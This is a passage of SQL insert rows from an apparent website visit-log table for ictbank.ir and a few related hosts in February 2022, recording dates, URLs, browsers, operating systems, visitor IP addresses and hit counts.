(18542,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.223.104.57','000',0,18,0),
(18543,'2022-02-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18544,'2022-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(18545,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(18546,'2022-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(18547,'2022-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(18548,'2022-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18549,'2022-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18550,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.135.131','000',0,1,0),
(18551,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.96.205.212','000',0,4,0),
(18552,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(18553,'2022-02-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(18554,'2022-02-08','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','2.182.1.198','000',0,1,0),
(18555,'2022-02-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.154.255.147','000',0,1,0),
(18556,'2022-02-08','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','114.124.188.137','000',0,1,0),
(18557,'2022-02-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18558,'2022-02-08','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','178.33.236.214','000',0,1,0),
(18559,'2022-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.194.8','000',0,1,0),
(18560,'2022-02-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.167.132.38','000',0,1,0),
(18561,'2022-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18562,'2022-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(18563,'2022-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18564,'2022-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18565,'2022-02-08','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','151.210.246.45','000',0,1,0),
(18566,'2022-02-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18567,'2022-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.93.67.194','000',0,6,0),
(18568,'2022-02-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18569,'2022-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.32.2','000',0,1,0),
(18570,'2022-02-09','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.195.1.228','000',0,1,0),
(18571,'2022-02-09','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','54.80.14.48','000',0,2,0),
(18572,'2022-02-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18573,'2022-02-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','102.91.5.71','000',0,1,0),
(18574,'2022-02-09','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(18575,'2022-02-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','77.171.242.38','000',0,1,0),
(18576,'2022-02-09','http://ictbank.ir/blog','Chrome','OS X','10.11',NULL,NULL,'','61.147.15.67','000',0,4,0),
(18577,'2022-02-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','8.30.234.26','000',0,1,0),
(18578,'2022-02-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(18579,'2022-02-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.150','000',0,2,0),
(18580,'2022-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.75.88','000',0,1,0),
(18581,'2022-02-09','http://ictbank.ir/','Chrome','Windows','6.3',NULL,NULL,'','46.183.218.138','000',0,3,0),
(18582,'2022-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.202.170.60','000',0,1,0),
(18583,'2022-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18584,'2022-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(18585,'2022-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18586,'2022-02-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(18587,'2022-02-09','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','54.166.225.89','000',0,1,0),
(18588,'2022-02-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','103.237.101.15','000',0,1,0),
(18589,'2022-02-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.114.247.102','000',0,1,0),
(18590,'2022-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.4.36.71','000',0,1,0),
(18591,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.22.253.192','000',0,1,0),
(18592,'2022-02-10','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,1,0),
(18593,'2022-02-10','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.109','000',0,1,0),
(18594,'2022-02-10','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.36.231','000',0,1,0),
(18595,'2022-02-10','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','8.26.182.24','000',0,1,0),
(18596,'2022-02-10','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','8.31.2.94','000',0,1,0),
(18597,'2022-02-10','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.219','000',0,1,0),
(18598,'2022-02-10','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.109','000',0,5,0),
(18599,'2022-02-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.182.157.251','000',0,1,0),
(18600,'2022-02-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18601,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.74.177.119','000',0,1,0),
(18602,'2022-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18603,'2022-02-10','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','199.187.211.173','000',0,5,0),
(18604,'2022-02-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','50.62.138.54','000',0,1,0),
(18605,'2022-02-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.144.25','000',0,1,0),
(18606,'2022-02-10','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','89.246.121.118','000',0,1,0),
(18607,'2022-02-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18608,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.32.92','000',0,1,0),
(18609,'2022-02-10','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','131.153.240.178','000',0,1,0),
(18610,'2022-02-10','http://82.102.9.14/blog','Chrome','Android','9',NULL,NULL,'','221.130.37.149','000',0,1,0),
(18611,'2022-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(18612,'2022-02-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.168.170','000',0,2,0),
(18613,'2022-02-10','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.124','000',0,1,0),
(18614,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.227.71','000',0,7,0),
(18615,'2022-02-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','212.129.4.166','000',0,2,0),
(18616,'2022-02-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18617,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18618,'2022-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18619,'2022-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.195.191','000',0,1,0),
(18620,'2022-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18621,'2022-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18622,'2022-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18623,'2022-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(18624,'2022-02-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.69.98','000',0,2,0),
(18625,'2022-02-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,10,0),
(18626,'2022-02-11','http://ictbank.ir/blog','Opera Mini','BlackBerry OS','Unknown',NULL,NULL,'','182.50.151.64','000',0,1,0),
(18627,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,2,0),
(18628,'2022-02-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.244','000',0,1,0),
(18629,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.101','000',0,4,0),
(18630,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.110','000',0,1,0),
(18631,'2022-02-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(18632,'2022-02-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','154.53.53.172','000',0,2,0),
(18633,'2022-02-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.114.247.102','000',0,1,0),
(18634,'2022-02-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(18635,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.144.21.56','000',0,2,0),
(18636,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.107.129.225','000',0,3,0),
(18637,'2022-02-11','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','50.31.21.10','000',0,2,0),
(18638,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.33.14','000',0,1,0),
(18639,'2022-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(18640,'2022-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18641,'2022-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18642,'2022-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18643,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.135.181','000',0,14,0),
(18644,'2022-02-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18645,'2022-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.190','000',0,1,0),
(18646,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(18647,'2022-02-12','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(18648,'2022-02-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(18649,'2022-02-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(18650,'2022-02-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.80.182.30','000',0,1,0),
(18651,'2022-02-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.71','000',0,2,0),
(18652,'2022-02-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18653,'2022-02-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
(18654,'2022-02-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.169','000',0,1,0),
(18655,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.90.32','000',0,1,0),
(18656,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.107.129.225','000',0,1,0),
(18657,'2022-02-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','92.204.37.72','000',0,1,0),
(18658,'2022-02-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.57.5','000',0,2,0),
(18659,'2022-02-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18660,'2022-02-12','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','105.235.71.168','000',0,1,0),
(18661,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.33.99','000',0,1,0),
(18662,'2022-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18663,'2022-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18664,'2022-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18665,'2022-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18666,'2022-02-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','198.148.127.64','000',0,1,0),
(18667,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.174.97.78','000',0,1,0),
(18668,'2022-02-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,3,0),
(18669,'2022-02-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.174.210.191','000',0,2,0),
(18670,'2022-02-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18671,'2022-02-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','164.68.117.150','000',0,1,0),
(18672,'2022-02-13','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.24.16','000',0,5,0),
(18673,'2022-02-13','http://82.102.9.14/blog','Edge','Windows','10.0',NULL,NULL,'','2.57.122.20','000',0,7,0),
(18674,'2022-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,4,0),
(18675,'2022-02-13','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','100.26.52.66','000',0,2,0),
(18676,'2022-02-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18677,'2022-02-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18678,'2022-02-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.154.255.147','000',0,1,0),
(18679,'2022-02-13','http://ictbank.ir/blog','Chrome','Android','4.4.2',NULL,NULL,'','80.242.1.255','000',0,2,0),
(18680,'2022-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(18681,'2022-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(18682,'2022-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18683,'2022-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18684,'2022-02-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18685,'2022-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.100.8.204','000',0,1,0),
(18686,'2022-02-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','122.10.84.144','000',0,1,0),
(18687,'2022-02-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(18688,'2022-02-14','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.226.3','000',0,1,0),
(18689,'2022-02-14','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','118.126.124.7','000',0,1,0),
(18690,'2022-02-14','http://mail.design-arena.ir/blog/','Chrome','OS X','10.15.7',NULL,NULL,'','118.126.124.198','000',0,1,0),
(18691,'2022-02-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18692,'2022-02-14','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','24.57.101.185','000',0,1,0),
(18693,'2022-02-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(18694,'2022-02-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.15','000',0,2,0),
(18695,'2022-02-14','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.245.220.130','000',0,12,0),
(18696,'2022-02-14','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.242.47.29','000',0,2,0),
(18697,'2022-02-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(18698,'2022-02-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
(18699,'2022-02-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18700,'2022-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.153.191','000',0,1,0),
(18701,'2022-02-14','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.189.41','000',0,3,0),
(18702,'2022-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.121','000',0,1,0),
(18703,'2022-02-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.12.82.236','000',0,1,0),
(18704,'2022-02-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(18705,'2022-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18706,'2022-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(18707,'2022-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18708,'2022-02-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18709,'2022-02-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,4,0),
(18710,'2022-02-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(18711,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.154.20.58','000',0,1,0),
(18712,'2022-02-15','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','221.130.37.189','000',0,1,0),
(18713,'2022-02-15','http://82.102.9.14/blog','Chrome','Android','9.0',NULL,NULL,'','221.130.37.193','000',0,1,0),
(18714,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(18715,'2022-02-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18716,'2022-02-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(18717,'2022-02-15','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','49.48.143.7','000',0,1,0),
(18718,'2022-02-15','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.252','000',0,1,0),
(18719,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(18720,'2022-02-15','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','45.185.148.123','000',0,1,0),
(18721,'2022-02-15','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.28','000',0,2,0),
(18722,'2022-02-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.196','000',0,2,0),
(18723,'2022-02-15','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,2,0),
(18724,'2022-02-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,1,0),
(18725,'2022-02-15','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,2,0),
(18726,'2022-02-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.199','000',0,1,0),
(18727,'2022-02-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.198','000',0,1,0),
(18728,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.112.11','000',0,1,0),
(18729,'2022-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18730,'2022-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(18731,'2022-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18732,'2022-02-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18733,'2022-02-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','74.208.58.97','000',0,1,0),
(18734,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.153.210.159','000',0,2,0),
(18735,'2022-02-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.130','000',0,2,0),
(18736,'2022-02-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.13.223.78','000',0,23,0),
(18737,'2022-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(18738,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.154.20.58','000',0,1,0),
(18739,'2022-02-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(18740,'2022-02-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(18741,'2022-02-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','132.145.39.16','000',0,4,0),
(18742,'2022-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18743,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.93.174.160','000',0,2,0),
(18744,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','112.66.105.224','000',0,1,0),
(18745,'2022-02-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18746,'2022-02-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.45.47.39','000',0,1,0),
(18747,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.45.47.44','000',0,1,0),
(18748,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.5','000',0,1,0),
(18749,'2022-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(18750,'2022-02-16','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.49','000',0,1,0),
(18751,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.8','000',0,2,0),
(18752,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,2,0),
(18753,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','220.246.100.81','000',0,1,0),
(18754,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.82.254','000',0,1,0),
(18755,'2022-02-16','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,1,0),
(18756,'2022-02-16','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.70','000',0,2,0),
(18757,'2022-02-16','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.38','000',0,1,0),
(18758,'2022-02-16','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.45.47.27','000',0,1,0),
(18759,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.173','000',0,2,0),
(18760,'2022-02-16','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(18761,'2022-02-16','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.84','000',0,1,0),
(18762,'2022-02-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.209.43.31','000',0,2,0),
(18763,'2022-02-16','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','191.36.225.249','000',0,1,0),
(18764,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.204.23','000',0,1,0),
(18765,'2022-02-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.236.54','000',0,2,0),
(18766,'2022-02-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','103.124.196.66','000',0,2,0),
(18767,'2022-02-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','114.4.4.133','000',0,1,0),
(18768,'2022-02-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','114.4.4.134','000',0,1,0),
(18769,'2022-02-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.10','000',0,6,0),
